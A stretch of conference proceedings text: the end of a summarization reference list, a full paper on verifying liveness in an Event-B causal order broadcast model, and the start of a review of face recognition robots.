27. Esther Hannah, M., & Geetha. (2011). Automatic extractive text summarization based on fuzzy
logic: A sentence oriented approach. In International Conference on Swarm, Evolutionary, and
Memetic Computing (pp. 530–538). Springer.
28. Malallah, S., & Ali, Z. H. (2017). Multi-document text summarization using fuzzy logic and
association rule mining. IASJ, 41, 241–258.
29. Goularte, F. B., Nassar, S. M., Fileto, R., & Saggion, H. (2019). A text summarization method
based on fuzzy rules and applicable to automated assessment. Expert Systems with Applications,
115, 264–275.
30. Van Lierde, Hadrien, & Chow, Tommy. (2019). Learning with fuzzy hypergraphs: A topical
approach to query-oriented text summarization. Inf. Sci., 496, 212–224.
31. Neto, J. L., Freitas, A. A., & Kaestner, C. A. A. (2002). Automatic text summarization using
a machine learning approach. In Brazilian symposium on artificial intelligence (pp. 205–215).
Springer.

32. Conroy, J. M., & O’leary, D. P. (2001). Text summarization via hidden markov models. In Pro-
ceedings of the 24th annual international ACM SIGIR conference on research and development
in information retrieval (pp. 406–407).
33. Shen, D., Sun, J.-T., Li, H., Yang, Q., & Chen, Z. (2004). Document summarization using
conditional random fields (pp. 2862–2867).
34. Ouyang, Y., Li, W., Li, S., & Qin, L. (2011). Applying regression models to query-focused
multi-document summarization. Information Processing and Management, 47(2), 227–237.
35. Fattah, M. A. (2014). A hybrid machine learning model for multi-document summarization.
Applied Intelligence, 40(4), 592–600.
36. Verma, P., & Om, H. (2019). MCRMR : Maximum coverage and relevancy with minimal
redundancy based multi-document summarization. Expert Systems With Applications, 120,
43–56.
37. Khan, R., Qian, Y., & Naeem, S. (2019). Extractive based text summarization using k-means
and tf-idf. International Journal of Information Engineering & Electronic Business, 11(3),
38. Kågebäck, M., Mogren, O., Tahmasebi, N., & Dubhashi, D. (2014). Extractive summarization
using continuous vector space models. In Proceedings of the 2nd Workshop on CVSC (pp.
31–39).
39. Kim, Y. (2011). Convolutional Neural Networks for Sentence Classification.
40. Yin, W., & Pei, Y. (2015). Optimizing sentence modeling and selection for document summa-
rization. In IJCAI (pp. 1383–1389).
41. Zhong, S., Liu, Y., Li, B., & Long, J. (2015). Query-oriented unsupervised multi-document
summarization via deep learning model. Expert Systems With Applications, 42(21), 8146–8155.
42. Joshi, A., Fidalgo, E., Alegre, E., Fernández-robles, L. (2019). SummCoder : An unsupervised
framework for extractive text summarization based on deep auto-encoders. Expert Systems
With Applications, 129, 200–215.
43. Cheng, J., & Lapata, M. (2016). Neural summarization by extracting sentences and words (pp.
484–494).
44. Yousefi-azar, M., & Hamey, L. (2017). Text summarization using unsupervised deep learning.
Expert Systems With Applications, 68, 93–105.
45. Nallapati, R., Zhai, F., & Zhou, B. (2017). Summarunner: A recurrent neural network based
sequence model for extractive summarization of documents. In Proceedings of the AAAI Con-
ference on Artificial Intelligence (Vol. 31).
46. Yao, K., Zhang, L., Luo, T., & Yanjun, W. (2018). Neurocomputing deep reinforcement learning
for extractive document summarization. Neurocomputing, 284, 52–62.
47. Anand, D., & Wagh, R. (2019). Effective deep learning approaches for summarization of legal
texts. Journal of King Saud University-Computer and Information Sciences.
48. Mani, I., House, D., Firmin, T., & Sundheim, B. (2002). Summac: A text summarization
evaluation. Natural Language Engineering, 8(1), 43–68.
49. Over, P., Dang, H., & Harman, D. (2007). DUC in context. Information Processing and Man-
agement, 43(6), 1506–1520.
50. Jones, K. S. (1998). Automatic summarising: Factors and directions (pp. 1–21).
51. Tsuchiya, G. (1971). Postmortem angiographic studies on the intercoronary arterial anasto-
moses: Report I. Studies on intercoronary arterial anastomoses in adult human hearts and
the influence on the anastomoses of structures of the coronary arteries. Japanese Circulation
Journal, 34(12), 1213–1220.
52. Saggion, H., Radev, D., Teufel, S., & Lam, W. (2002). Meta-evaluation of summaries in a cross-
lingual environment using content-based metrics. In COLING 2002: The 19th International
Conference on Computational Linguistics.
Formal Verification of Liveness
Properties in Causal Order Broadcast
Systems Using Event-B

Pooja Yadav, Raghuraj Suryavanshi, and Divakar Yadav

Abstract Distributed systems have complex designs which are difficult to under-
stand and verify. A rigorous specification of such systems using mathematical tech-
niques such as formal methods is required to understand their precise behavior. Safety
property implies that the system is free from deadlocks and safe with respect to the
invariants, while the liveness property ensures that the system eventually makes
progress. Group communication protocols are among the building blocks of reliable distributed system applications. One such message ordering protocol is causal order broadcast, in which message delivery at the various processes takes place as per the causal order. This paper presents how the liveness properties are preserved
by message passing in causal order using Event-B. An incremental model for causal
order-based message passing is constructed using Event-B specification. The prop-
erties of causal order broadcast are first specified using an abstract model, and then,
details are added with each refinement step. Liveness property is ascertained by
ensuring enabledness preservation and non-divergence among various refinements
and is expressed as invariants in the model of causal order broadcast system.

Keywords Formal methods · Causal order · Event-B · Liveness properties ·


Enabled preservation property · Non-divergence property

P. Yadav (B)
Dr. A.P.J. Abdul Kalam Technical University, Lucknow 226021, India
e-mail: poojayadav255@gmail.com
R. Suryavanshi
Pranveer Singh Institute of Technology, Kanpur 209305, India
e-mail: raghuraj.suryavanshi@gmail.com
D. Yadav
Institute of Engineering and Technology, Lucknow 226021, India
e-mail: dsyadav@ietlucknow.ac.in


1 Introduction

Two important properties in the specification of distributed systems protocols and


models are safety and liveness. The distinction between liveness and safety proper-
ties and various tools and techniques to verify them are discussed in [1]. Liveness
property indicates that eventually something positive will occur, and safety property
as described in [2] indicates that something negative will not occur during system
execution. In this paper, we demonstrate the preservation of liveness property in
causal ordered message-passing systems using enabledness preservation and non-
divergence. Event-B [3] is used for the rigorous mathematical specification and design of models of distributed systems, step by step, from an abstract model to further refinements, and for verifying the correctness of the system through the discharge of proof obligations. The guards of each event are strengthened with every refinement step. Reference [4] outlines the procedure for the incremental development of Event-B models through refinement.

1.1 Event-B and Rodin

The two main components of an Event-B model [5, 6] are contexts and machines [7].
The static part of the model comprises contexts, which contain sets, axioms, and constants. Sets can be of two types, carrier or enumerated. The properties of these
sets and constants are defined by axioms. The behavioral properties of the model are
represented by machines which contain the system variables, theorems, invariants,
and events. The state of the machine is defined by variables. The constraints that
must be applied on the machine’s variables are represented by the invariants of the
machine [4]. First, an abstract machine is modeled, and then, it is refined to intro-
duce more concrete specifications [8]. Every state of the machine during execution
must satisfy all the invariants [9]. The events in the model define how the state of the
machine may evolve. An event comprises guards and actions. The list of actions of an event is invoked only if all the guards associated with that event become true [10]. Proof obligations are used to verify the properties of a machine through consistency checking and refinement checking [7, 11]. Event-B tools discharge proof obligations using an automatic prover or through interaction [7]. A detailed description of the notation of Event-B is given in [12]. Several B tools are available, such as Rodin [7], B-Toolkit [13], Atelier B [14], and Click'n'Prove [15]. We have used the Rodin platform [7, 16] for our research work. It has various embedded plugins such as model checkers, provers, a proof-obligation generator, and UML transformers. Rodin provides a platform
for consistency and refinement checking through generation and discharge of proof
obligations.

1.2 Causal Order Broadcast

The causal order was formally defined by Lamport in [17]. The causal order property
is a combination of FIFO order and local order property [18]. Birman, Schiper, and
Stephenson proposed causal ordering of messages in [19]. FIFO order property [20]
states that “if any site Si broadcasts a message M1 before broadcasting message M2
then each receiving site delivers M1 before M2.” Local order property [20] states
that “if any site Si delivers message M1 before broadcasting message M2 then every
receiving site delivers M1 before M2.” The causal order property states that “if
broadcasting of a message M1 causally precedes broadcasting of a message M2 then
delivery of message M1 at each site should be done before the delivery of message
M2.”
The remainder of the paper is organized as follows: Section 2 summarizes the literature
review, Section 3 gives the formal analysis of liveness property in causal order broad-
cast systems, Sections 4 and 5 demonstrate the analysis of enabledness preservation
and non-divergence property, respectively, in causal order broadcast systems, and
Section 6 provides a conclusion to the work done.

2 Literature Review

Extensive research has been done in the field of formal modeling and verification of various protocols related to distributed systems. Event-B is one such platform for the formal development of distributed system protocols. Reference [12] demonstrates the formal verification of atomic commitment of distributed transactions. The paper also addresses
highlights the formal development of an incremental model of total order broadcast
in distributed transactions using Event-B. Formal verification of safety and liveness
properties in distributed transactions is presented in [23]. Formal development and
verification of causal order-based load balancing protocol using Event-B are shown
in [20]. The details of various message ordering properties such as causal order and
total order are given in [22]. The paper highlights various aspects of causal order
broadcast and total order broadcast through events and invariants. An abstract model
of causal order broadcast is developed, and then, it is refined by adding the details at
each refinement stage. In this paper, we take the work forward by demonstrating the
liveness properties of causal order message passing-systems by ensuring enabled-
ness preservation and non-divergence through various refinements of causal order
broadcast model using Event-B and Rodin platform.

3 Formal Analysis of Liveness Properties in Causal Order


Broadcast Systems

The details of the Event-B model of causal order are given in [23]. First, an abstract machine for reliable broadcast is developed, and then it is refined to an abstract causal order model. In the next refinement, we proceed toward vector clocks. The vector clock
rules replace the abstract causal order. The various stages of refinement of causal
order broadcast model are described below.
Abstract Machine: Figure 1 shows the abstract machine for causal order broadcast.
In the abstract machine, PROC and MSG are sets of processes and messages, respec-
tively, and PROC is a finite set. Variables assumed are sender and causaldeliver.
Invariants 1 and 2 give sender and causaldeliver definition as mapping from MSG to
PROC and relation of PROC and MSG, respectively. Invariant 3 states that processes
that delivered the message will be in the set of processes that sent the message. In the event Broadcast, for any PROC p and MSG m, if m has not previously been sent by the sender process, then it is broadcast to all processes, and the variable sender is updated. In the event Deliver, for any PROC p and MSG m, if message m has been sent by a sender and has not yet been delivered by the process, then m is delivered by p, and the variable causaldeliver is updated.

Fig. 1 Abstract machine for causal order broadcast

First Refinement: Figure 2 shows the first refinement of the causal order broadcast
machine. Typing invariant 4 defines causalorder as relation of MSG to MSG. Here,
ordering is done at the time of sending, so messages ordered will be in the set of
messages sent by the process as shown in invariant 5. Invariants 6 and 7 show that
causal ordering can be imposed only on those messages that have already been sent.
In the broadcast event, when a process p broadcasts a message m, then the updating of
the variable causalorder takes place as per the mappings specified by sender−1[{p}] × {m}. It shows that, as per the FIFO order, all messages broadcast by the process p
before broadcasting the message m causally precede message m. Similarly, local order
is confirmed by showing the mappings in causaldeliver[{p}] × {m} which signify
that the messages causally delivered to the process p before process p broadcasts
message m also precede message m causally. In the deliver event, guard 3 ensures that message m has not yet been delivered at process p, and guard 4 ensures that process p belongs to the domain of deliveryorder. Actions 1 and 2 ensure that the message m is delivered at process p. After the event has occurred, the variables causaldeliver and deliveryorder are updated.

Fig. 2 Refinement 1 for causal order broadcast
Second Refinement: In this refinement (Fig. 3), the causal order broadcast system
is refined using vector clocks. The global variable causalorder is replaced by vector
clock rules.
Birman, Schiper, and Stephenson's protocol [19] is used in our model to update the vector clock at the sender and receiver processes and to update the timestamps of the messages. The new variable vtp denotes the vector clock at a process, while the variable vtm denotes the vector timestamp of a message. The variables vtm and vtp are defined as arrays of vectors in invariants 8 and 9, respectively, where the value for each message and process is initialized to zero. In the broadcast event of refinement-2, the causal order of refinement-1 is replaced by vector clock rules. When a message is broadcast by a process pp, the vector clock value of process pp, vtp(pp)(pp), is incremented by 1, and the resulting clock becomes the vector timestamp of message m. The total number of messages sent by process pp is denoted by vtp(pp)(pp). In the event Deliver, a message is delivered to a process only if the receiving process has delivered all the previous messages from the sender of that message. The vector timestamp of the receiver process is compared to the vector timestamp of the incoming message to ensure that all the messages delivered by the sender of that message before sending it are also delivered at the receiver process.

Fig. 3 Refinement 2 for causal order broadcast
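The following is an illustrative Python sketch of these vector clock rules (not the Event-B model itself), following the Birman, Schiper, and Stephenson protocol [19]; the process names and the example scenario are assumptions made only for the demonstration.

```python
# Vector clock broadcast/delivery rules used in the second refinement.

def on_broadcast(vtp, sender):
    """Sender increments its own entry; a copy becomes the message timestamp VTM(m)."""
    vtp[sender][sender] += 1
    return dict(vtp[sender])

def can_deliver(vtp, receiver, vtm, sender):
    """Delivery guard as stated in the paper: the message must be the next one
    from its sender, and every causally preceding message must already be delivered."""
    next_from_sender = vtp[receiver][sender] == vtm[sender] - 1
    seen_rest = all(vtp[receiver][p] >= vtm[p] for p in vtm if p != sender)
    return next_from_sender and seen_rest

def on_deliver(vtp, receiver, vtm):
    """After delivery the receiver's clock absorbs the message timestamp."""
    for p in vtm:
        vtp[receiver][p] = max(vtp[receiver][p], vtm[p])

procs = ["p1", "p2", "p3"]
vtp = {p: {q: 0 for q in procs} for p in procs}   # all clocks start at zero

vtm1 = on_broadcast(vtp, "p1")                    # p1 broadcasts m1
vtm2 = on_broadcast(vtp, "p1")                    # then m2
print(can_deliver(vtp, "p2", vtm2, "p1"))         # False: m1 not yet delivered at p2
on_deliver(vtp, "p2", vtm1)
print(can_deliver(vtp, "p2", vtm2, "p1"))         # True: causal order now satisfied
```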

4 Analysis of Enabledness Preservation Property

In a model of distributed systems, we need to prove that the system eventually


completes its execution and is free from deadlock. This requires us to prove that if causal order is followed in the abstract model, then it is followed in the concrete model as well. This is ensured by the property of enabledness preservation. To prove enabledness preservation in an Event-B model, we need to prove that if the guards of one or more events in the abstraction are triggered, then the guards of one or more events in the refinement must also be triggered [21].
Let a_1, a_2, a_3, …, a_n be the events in the abstraction and let r_1, r_2, r_3, …, r_n be the corresponding events in the refined machine. The events r_i refine the events a_i. Let rn_1, rn_2, …, rn_k be the new events introduced in the refinement. The weaker notion of enabledness preservation is given in [23] as:

Grd(a_1) ∨ Grd(a_2) ∨ … ∨ Grd(a_n) ⇒ Grd(r_1) ∨ Grd(r_2) ∨ … ∨ Grd(r_n) ∨ Grd(rn_1) ∨ Grd(rn_2) ∨ … ∨ Grd(rn_k)   (1)

The weaker notion of enabledness preservation as per Eq. (1) means that if the guards of one of the events are triggered at the abstract level, then the guards of one or more events will also be triggered at the refinement level. The stronger notion of enabledness preservation as per [23] states that if the guards of an event a_i are enabled in the abstraction, then either the guards of its refining event r_i or the guards of one of the newly introduced events must also be enabled, as in Eq. (2):

Grd(a_i) ⇒ Grd(r_i) ∨ Grd(rn_1) ∨ Grd(rn_2) ∨ … ∨ Grd(rn_k)   (2)

In our model, we have an abstract machine named abstract which is refined by


the machine Refinement 1 which is further refined by the machine Refinement 2. The
machine abstract has two events Broadcast and Deliver. The machine Refinement 1
also has two events Broadcast and Deliver which refine the Broadcast and Deliver
events, respectively, of the abstract machine. We prove the weaker and stronger

notion of enabledness preservation by adding the invariants 10, 11, and 12 in the first
refinement machine Refinement 1.
For the weaker notion: Guard(Broadcast) ∨ Guard(Deliver) ⇒ Guard(Broadcast) ∨ Guard(Deliver).
Inv 10: ∀ m,p · ((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (m ∈ dom(sender) ∧ (p → m) ∉ causaldeliver) ⇒ (p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (m ∈ dom(sender) ∧ (p → m) ∉ causaldeliver) ∨ (p ∈ dom(deliveryorder))).
For the stronger notion: Guard(Broadcast) ⇒ Guard(Broadcast).
Inv 11: ∀ m,p · ((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ⇒ (p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender))).
Guard(Deliver) ⇒ Guard(Deliver).
Inv 12: ∀ m,p · ((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∉ causaldeliver) ⇒ (p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∉ causaldeliver) ∨ (p ∈ dom(deliveryorder))).
The machine Refinement 2 also has two events Broadcast and Deliver which
refine the Broadcast and Deliver events, respectively, of the machine Refinement 1.
Similarly, we add the invariants 13, 14, and 15 to the machine Refinement 2 to prove
the weaker and stronger notion of enabledness preservation.
For the weaker notion: Guard(Broadcast) ∨ Guard(Deliver) ⇒ Guard(Broadcast) ∨ Guard(Deliver).
Inv 13: ∀ pp,m,p · ((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (m ∈ dom(sender) ∧ (p → m) ∉ causaldeliver) ∨ (p ∈ dom(deliveryorder)) ⇒ (pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ {nVTP = VTP(pp) ← {pp → VTP(pp)(pp) + 1}} ∨ (m ∈ dom(sender)) ∨ ((pp → m) ∉ causaldeliver) ∨ (∀p · (p ∈ PROC ∧ p ≠ sender(m) ⇒ VTP(pp)(p) ≥ VTM(m)(p))) ∨ (VTP(pp)(sender(m)) = (VTM(m)(sender(m))) − 1)).
For the stronger notion: Guard(Broadcast) ⇒ Guard(Broadcast).
Inv 14: ∀ m,pp,p · ((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ⇒ (pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∉ dom(sender)) ∨ (nVTP = VTP(pp) ← {pp → VTP(pp)(pp) + 1})).
Guard(Deliver) ⇒ Guard(Deliver).
Inv 15: ∀ m,pp,p · ((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∉ causaldeliver) ∨ (p ∈ dom(deliveryorder)) ⇒ (pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender)) ∨ ((pp → m) ∉ causaldeliver) ∨ (∀p · (p ∈ PROC ∧ p ≠ sender(m) ⇒ VTP(pp)(p) ≥ VTM(m)(p))) ∨ (VTP(pp)(sender(m)) = (VTM(m)(sender(m))) − 1)).

5 Analysis of Non-divergence Property

Non-divergence is a liveness property which states that events which are newly
introduced in the refinement steps do not take control forever, i.e., the new events
should not diverge or run forever. A variant V such that V ∈ N, where N is the set of natural numbers, is used to prove that newly introduced events do not diverge. The execution of a new event in the refinement decreases the value of the variant, but the value of the variant must never go below zero. In our model of causal order broadcast, we would like to ensure that a message is never re-broadcast because of repeated execution of the broadcast event. It is also important to prove that each sent message is delivered to each process only once. A new variable var is introduced in the abstract model, and the value of var for each message is set to one. The variable var is initialized as var := MSG × {1} in the initialization event. Each occurrence
of the broadcast event decreases the value of the variable var and sets it to zero.
Thereby once a message is broadcast, the value of the variable var becomes zero and
it cannot be decreased further. Therefore, if the invariants defined on the variable
var are satisfied, a message once broadcast cannot be broadcast again. Similarly, the
variable, delvar which is added to the abstract model ensures that a message once
delivered by a particular process successfully cannot be redelivered by it.
The invariants corresponding to the variables var and delvar are added to the
abstract model. Invariant 16 shows that variable var is assigned to each message and
is a natural number. Invariant 17 shows that the number of processes in the broadcast
system is finite. Invariant 18 shows that if the value of var for any message is zero
then that message has been broadcast. Invariant 19 states that for a particular message
m, the value of var is always greater than zero, and it cannot be less than zero as var
is a natural number.
Inv 16: var ∈ MSG → NATURAL.
Inv 17: card(PROC) ∈ NATURAL.
Inv 18: ∀(mm) · (mm ∈ MSG ∧ (var(mm) = 0) ⇒ mm ∈ dom(sender)).
Inv 19: ∀(m) · (m ∈ MSG ⇒ var(m) > 0).
Inv 20: delvar ∈ MSG → NATURAL.
Inv 21: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ causaldeliver−1 [{m}] = PROC
⇒ card(causaldeliver−1 [{m}]) = card(PROC)).
The initial value of delvar for each message is set to the total number of processes
in the system. On occurrence of each Deliver event, the value of delvar is decreased by
one. If a message is delivered to all the processes, the value of delvar for that message
becomes zero. Any re-delivery of the message at a process will set the value of delvar
to a negative value, thereby violating the invariants defined on delvar. Invariant 20
states that each message is assigned with a variable delvar which decreases as the
message is delivered by each process. Invariant 21 states that if a message is broadcast
by the sender and all processes have delivered the message then the number of
processes that delivered the message is equal to the number of processes in the system.
We further add invariants defined on the variables var and delvar to the model. If a

message m is broadcast by any process and all the processes have delivered m then
the value of delvar is zero stated by invariant 22.
Inv 22: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ card (causaldeliver−1 [{m}]) =
card (PROC) ⇒ delvar(m) = 0).
Inv 23: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ card (causaldeliver−1 [{m}]) <
card (PROC) ⇒ delvar(m) > 0).
Inv 24: ∀(m) · (m ∈ MSG ∧ (causaldeliver−1 [{m}] = PROC) ⇒ (delvar(m) =
0)).
Inv 25: ∀(m) · (m ∈ MSG ∧ causaldeliver−1 [{m}] ⊂ PROC ⇒ delvar(m) > 0).
Inv 26: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender) ⇒ card (causaldeliver−1 [{m}])
≤ card (PROC)).
Invariant 23 states that if a message m has not been delivered to all the processes
then delvar > 0. This means that message m has not been delivered to some processes.
Invariants 24 and 25 state that if a message has been delivered to all the processes
then the value of delvar is zero else it is more than zero. Similarly, invariant 26 states
that the number of processes a message has been delivered to will always be less than
or equal to the total number of processes in the system. The model and the invariants
shown above were checked successfully using Rodin platform with ProB animator
model checker, and no anomalies were found. This ensures our assumption that in
our model of causal order broadcast each message is broadcast only once, and every
process will deliver each message only once.

6 Conclusions

The liveness property in the Event-B model of causal order broadcast system has
been discussed in this paper. Liveness property expresses that the Event-B model
makes progress. To ensure the property of liveness in the proposed model, we had to
ensure that our model of causal order broadcast is enabledness preserving and non-
divergent. Proving non-divergence in the model of causal order broadcast system
requires us to prove that no message is re-broadcast in our system, and each message
is delivered to each process only once. We have outlined how we can introduce a
variant and how the invariant properties can be constructed on variants. Enabledness
preservation can be proved by proving that when the refined model makes progress,
the abstract model also makes progress. We have outlined the process of construction
of invariant properties to ensure enabledness preservation. This work was carried out
on B Tools, RODIN, and ProB model checker. Both enabledness preservation and
non-divergence properties are conserved in this model of causal order broadcast
system, thus ensuring the liveness property in the model. The proof statistics of the
Event-B model of causal order broadcast system with liveness property are given
below in Table 1:

Table 1 Proof statistics of the proposed model


| Machine | Total POs | No. of POs discharged automatically | No. of POs discharged interactively |
|---|---|---|---|
| Abstract machine | 5 | 5 | 0 |
| First refinement | 33 | 22 | 11 |
| Second refinement | 36 | 30 | 6 |
| Overall | 74 | 57 | 17 |

PO—Proof obligations

The model was checked successfully using Rodin platform with ProB animator
model checker, and no anomalies were found. Total 74 proof obligations were
generated and discharged either interactively or automatically.

References

1. Kindler, E. (1994). Safety and liveness properties: A survey. Bulletin of the European
Association for Theoretical Computer Science, 53, 268–272.
2. Lamport, L. (1977). Proving the correctness of multiprocess programs. IEEE Transactions on
Software Engineering, 3(2), 125–143.
3. Abrial, J. R. (1996) The B Book. Assigning programs to meanings. Cambridge University
Press, Cambridge.
4. Butler, M., & Yadav, D. (2008). An incremental development of mondex system in Event-B.
Formal Aspects of Computing, 20(1), 61–77.
5. Bodeveix, J. P., Dieumegard, A., & Filali, M. (2020). Event-B formalization of a variability-
aware component model patterns framework. Science of Computer Programing, 199, 102511.
6. Lahbib, A., et al. (2020). An event-B based approach for formal modelling and verification
of smart contracts. In International Conference on Advanced Information Networking and
Applications. Springer.
7. Metayer, C., Abrial, J. R., & Voison, L. (2005). Event-B language. RODIN deliverables 3.2,
http://rodin.cs.ncl.ac.uk/deliverables/D7.pdf.
8. Suryavanshi, R., & Yadav, D. (2012). Rigorous design of lazy replication system using Event-B.
In International Conference on Contemporary Computing. Springer.
9. Girish C., & Yadav, D. (2010). Analyzing data flow in trustworthy electronic payment systems
using event-B. In International Conference on Data Engineering and Management. Springer.
10. Yadav, D., & Butler, M. (2009). Formal development of a total order broadcast for distributed
transactions using Event-B. Method, Models and Tool for Fault-Tolerance Lecture Notes in
Computer Science (LNCS), 5454, 152–176.
11. Lahouij, A., et al. (2020). An Event-B based approach for cloud composite services verification.
Formal Aspects of Computing, 32(4), 361–393.
12. Yadav, D., & Butler, M. (2006). Rigorous design of fault-tolerant transactions for replicated
database systems using Event-B. In M. Butler, C. B. Jones, A. Romanovsky, & E. Troubitsyna (Eds.), Fault-Tolerant Systems, LNCS (Vol. 4157, pp. 343–363). Springer.
13. B Core UK Ltd. B-Toolkit Manuals (1999)
14. Steria, Atelier-B User and Reference Manuals (1997)
15. Abrial, J. R., & Cansell, D. (2003) Click’n’Prove—Interactive Proofs within Set Theory.
16. Abrial, J.-R., Butler, M., Hallerstede, S., Hoang, T. S., Mehta, F., & Voisin, L. (2010). Rodin: An open toolset for modelling and reasoning in Event-B. International Journal on Software Tools for Technology Transfer (STTT), 12(6), 447–466.

17. Lamport, L. (1978). Time, clocks, and the ordering of events in a distributed system.
Communication, ACM, 21(7), 558–565.
18. Yadav, D., & Butler, M. (2007). Formal specifications and verification of message ordering
properties in a broadcast system using Event-B. In Technical Report. School of Electronics and
Computer Science, University of Southampton.
19. Birman, K., Schiper, A., & Stephenson, P. (1991). Lightweight causal and atomic group
multicast. ACM Transactions Computer System, 9(3), 272–314.
20. Pooja, Y., Suryavanshi, R., Singh, A. K., & Yadav, D. (2019). Formal verification of causal
order-based load distribution mechanism using Event-B. Data engineering and applications
(pp. 229–241). Springer.
21. Abrial, J.-R. (1996). Extending B without changing it (for developing distributed systems). In
H. Habrias (Ed.), First B Conference.
22. Yadav, D., & Butler, M. Formal development of broadcast systems and verification of ordering
properties using Event-B.
23. Yadav, D., & Butler, M. (2009). Verification of liveness properties in distributed systems.
In International Conference on Contemporary Computing (pp. 625–636). Springer.
A Comparative Study on Face
Recognition AI Robot

Somesh Sunar, Shailendra K. Tripathi, Usha Tiwari, and Harshit Srivastava

Abstract Face recognition, the application of image processing, has gained a lot of
attention. People have started researching and working on it to enhance the field of
automation, security, and surveillance. The main reason behind this hype is the vast
availability of commercial applications and accessibility to the latest technologies.
Though the machine level recognition systems have gained a certain level of perfec-
tion, their success rate can be limited based on the application. This is because the
image captured by the outdoor system is hard to detect and recognize due to change
in light, different background conditions, and variations in the position of the person
or object. So, we can say that the present system is far behind the perfection that
a human possesses. This paper provides information on both still and moving, i.e.,
video-based face recognition. The main reason behind writing this review paper is to
shed light on the existing literature on this topic and add some more value to knowl-
edge gained concerning machine-based face recognition. Most of the systems use the local binary pattern (LBP) approach to perform face recognition. For detecting the face in the captured image, the Haar cascade algorithm is used, and the person's facial features are extracted and saved in a database for future reference. So, to provide an effective survey, we have classified the existing methods for face recognition and explored the latest emerging technologies in this field.

Keywords Face recognition robot · Face detection · LBP algorithm · Raspberry


Pi · Haar cascade · Infrared thermometer

S. Sunar (B) · S. K. Tripathi · U. Tiwari
Department of EECE, Sharda University, Greater Noida, India
H. Srivastava
Highlands, Noida, India

1 Introduction

A face recognition robot utilizes a method of image processing for detecting a face using a camera. The robot [1–5] identifies various essential features of the face from the captured image and then compares it with the stored data. Various algo-
rithms/methods/techniques are used for recognizing a human face, such as local
binary pattern (LBP), support vector machine (SVM), etc.
Most face recognition systems use the PiCamera camera module to capture the image, while a Raspberry Pi 3 is used to implement face detection and recognition [1–8]. The Viola–Jones framework, introduced by Paul Viola in 2001, uses AdaBoost for face detection. This algorithm mainly uses a cascade classifier built on Haar-like features. These features give it the ability to detect a human face regardless of the background conditions, the color of the captured image, and its size and shape. For recognition, on the other hand, the local binary pattern algorithm quickly recognizes a face [6–8, 10]. The face's digital image is divided into pixels, which are used for further processing, and the identified features are compared pixel by pixel with the features stored in the dataset [11–13]. The robot performs various activities that are controlled using an Arduino Uno. It detects the motion of any object using a PIR sensor, which initiates the recognition process, and the robot's motion can also be controlled using a phone [13–16]. When a human face is recognized, an SOS message (alert message) is sent to the organization's owner.
The whole process performed by the robot is divided into three stages:
• In the first stage [1–11], a face is detected using the Viola–Jones detection algorithm.
• Further [5–10], in the second stage, the detected face is tracked using the Kanade–Lucas–Tomasi (KLT) algorithm.
• Additionally, in the third stage, the vital features are identified, which completes the tracking process. Overall, the whole procedure of tracking a face is an amalgamation of detection followed by identifying unique points in the detected face using any of the known algorithms (a rough sketch of this pipeline follows the list).
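Below is an illustrative OpenCV sketch of this three-stage pipeline (Viola–Jones detection, point selection inside the face box, and KLT tracking); it is not the robot's code, and it assumes a webcam at index 0 and a face visible in the first frame.

```python
# Detect a face with the Viola-Jones cascade, then track corner points with KLT.
import cv2
import numpy as np

cascade = cv2.CascadeClassifier(
    cv2.data.haarcascades + "haarcascade_frontalface_default.xml")

cap = cv2.VideoCapture(0)                      # camera index 0 is an assumption
ok, frame = cap.read()
prev_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)

# Stage 1: Viola-Jones detection on the first frame (assumes one face is present).
(x, y, w, h) = cascade.detectMultiScale(prev_gray, scaleFactor=1.1, minNeighbors=5)[0]

# Stage 2: pick unique corner points inside the detected face box.
mask = np.zeros_like(prev_gray)
mask[y:y + h, x:x + w] = 255
points = cv2.goodFeaturesToTrack(prev_gray, maxCorners=50,
                                 qualityLevel=0.01, minDistance=5, mask=mask)

# Stage 3: follow those points frame by frame with the KLT (Lucas-Kanade) tracker.
while True:
    ok, frame = cap.read()
    if not ok:
        break
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    points, status, _ = cv2.calcOpticalFlowPyrLK(prev_gray, gray, points, None)
    points = points[status.flatten() == 1].reshape(-1, 1, 2)   # keep successfully tracked points
    for px, py in points.reshape(-1, 2):
        cv2.circle(frame, (int(px), int(py)), 3, (0, 255, 0), -1)
    cv2.imshow("KLT face tracking", frame)
    if cv2.waitKey(1) & 0xFF == ord("q"):
        break
    prev_gray = gray
```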

2 Literature Review

In [1], face recognition is performed with cascade classification and the LBPH face recognizer method using Python 2.7 with the OpenCV library; it offers an excellent accuracy of 92.73%. The paper [2] performs real-time human–robot interaction indoors, where it processes 11 frames per second and provides a 94% recognition rate using a visual tracking architecture and RBF neural networks. It performs rapid face recognition of family members, as each member has a distinct RBF neural network. Paper [3] presents a comparison between AdaBoost and Imaboost. AdaBoost, using a combination of simple classifiers, generates a comparatively strong classifier, and the clonal selection algorithm replaces the selection of the best classifier. A combination of AdaBoost and an artificial immune system is proposed as Imaboost, which enhances system processing by improving the classification performance.
In [4], face detection is performed on a live video stream for security in commercial
places. It is designed to perform the detection using the web camera and to track the
